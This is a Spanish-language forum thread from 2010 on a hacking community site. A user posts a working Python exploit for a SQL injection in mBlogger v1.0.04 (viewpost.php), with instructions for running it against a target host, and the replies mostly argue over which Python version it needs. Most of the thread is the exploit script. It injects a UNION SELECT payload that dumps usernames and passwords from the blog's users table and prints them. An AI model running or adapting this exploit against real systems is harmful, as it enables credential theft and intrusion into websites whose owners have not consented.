Indetectables

Indetectables es una Comunidad de Hacking, Seguridad Informática, Impresión 3d y Desarrollo
./index.php

mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

https://www.indetectables.net/viewtopic.php?t=26187

Página 1 de 1

mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Publicado: 03 Sep 2010, 09:49
por Skillmax
mBlogger.. vulnerable a SQL, el exploit está en python, descargais su interprete, y después poneis el codigo en un bloc de notas con la extensión .py, miren la utilización del exploit


Imagen


Código: Seleccionar todo

#!/usr/bin/python
#
# Exploit Title:   mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit
# Date         :   31 August 2010
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/mblogger/
# Version      :   1.0.04
# Tested on    :   EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + viewpost.php => SQL Injection!!
#
# 30: $query = "SELECT id, name, subject, message, posted FROM posts WHERE
#     id = '$_GET[postID]'";
# 31: $result = mysql_query($query) or die(mysql_error());
# 32: while($row = mysql_fetch_array($result, MYSQL_ASSOC))
# 33: {
# 34:   echo "<div class='posttitle'>";
# 35:   echo "<h3>" . $row['subject'] . "</h3>";
# 36:   echo "</div>";
# 37:   echo "<div class='postbody'>";
# 38:   echo "<p> Posted by: " . $row['name'] . " on " . $row['posted'] . "</p>";
# 39:   echo "<p>" . $row['message'] . "</p>";
# 40:   echo "</div>";
# 41:   $postID = $row['id'];
# 42: }
#
 
import re
import sys
import http.client
 
 
def usage(prog):
    print('Usage  : ' + prog + ' <target> <path>\n')
    print('Example: ' + prog + ' localhost /mBlogger/')
    print('         ' + prog + ' www.target.com /complet/path/')
    return
 
 
def exploit(target, path):
    payload  = 'viewpost.php?postID=-1%27%20UNION%20SELECT%201,%27h4x0r%27,%27'
    payload += 'credentials%27,CONCAT(%27%3C1%3E%27,username,%27:%27,password,'
    payload += '%27%3C2%3E%27),%20NULL%20FROM%20users%20--%20%27'
 
    print('[+] Sending HTTP Request')
    con = http.client.HTTPConnection(target)
    con.request('GET', path + payload)
    res = con.getresponse()
 
    if res.status != 200:
        print('[!] HTTP GET Request Failed')
        exit(1)
 
    print('[+] Parsing HTTP Response')
    data = res.read().decode()
    pattern = re.compile(r"<1>(.+?)<2>", re.M)
     
    print('[+] Information Extracted:\n')
    credentials = pattern.findall(data)
    for element in credentials:
        print(element)
     
    return
 
 
 
print('\n+-----------------------------------------------------------------------------+')
print('| mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit by Ptrace Security    |')
print('+-----------------------------------------------------------------------------+\n')
 
if len(sys.argv) != 3:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1], sys.argv[2])
 
exit(0)

Cualquier cosa me avisen hermanos... os dejo el interprete.


[Enlace externo eliminado para invitados]


[Enlace externo eliminado para invitados]


Re: mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Publicado: 03 Sep 2010, 22:04
por Fantasma17
Si está en python porque dejas el interprete de perl ?

Re: mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Publicado: 03 Sep 2010, 23:26
por Skillmax
Fantasma17 escribió:Si está en python porque dejas el interprete de perl ?

Sí gracias por avisar me equivoqué , aquí está el otro:

[Enlace externo eliminado para invitados]

Re: mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Publicado: 05 Sep 2010, 14:03
por Word
Skillmax escribió:
Fantasma17 escribió:Si está en python porque dejas el interprete de perl ?

Sí gracias por avisar me equivoqué , aquí está el otro:

[Enlace externo eliminado para invitados]
Te equivocas otra vez , el interpetre necesario es para la version 3.0 , como ves utiliza print como funcion ....

Re: mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Publicado: 05 Sep 2010, 14:04
por Skillmax
Word, yo tengo el interprete 2.7 y me funciona..

Re: mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Publicado: 05 Sep 2010, 14:14
por Word
[Enlace externo eliminado para invitados] (Mira el apartado de print )
[Enlace externo eliminado para invitados] ... on-2x.html

La version 2.7 esta hecha para "allanar" el camino a la version 3.0 y supongo que por eso la acepta pero talvez tengas algunos problemas asi que utilizando la 3.0 te aseguras de que te funcionara todo, ya que tambien acepta la forma de la 2.x

Re: mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Publicado: 05 Sep 2010, 14:20
por Skillmax
Gracias por los links, yo no manejo el python, manejo el perl.. por eso no sé de python.. la version 2.7 me va sin problemas.

Re: mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Publicado: 07 Sep 2010, 14:43
por $DoC
muy bueno Skillmax, cuando tenga tiempo le pego una miradita

saludos!!
Todos los horarios son UTC+02:00
Página 1 de 1

© Indetectables Team

Desarrollado por Indetectables LAB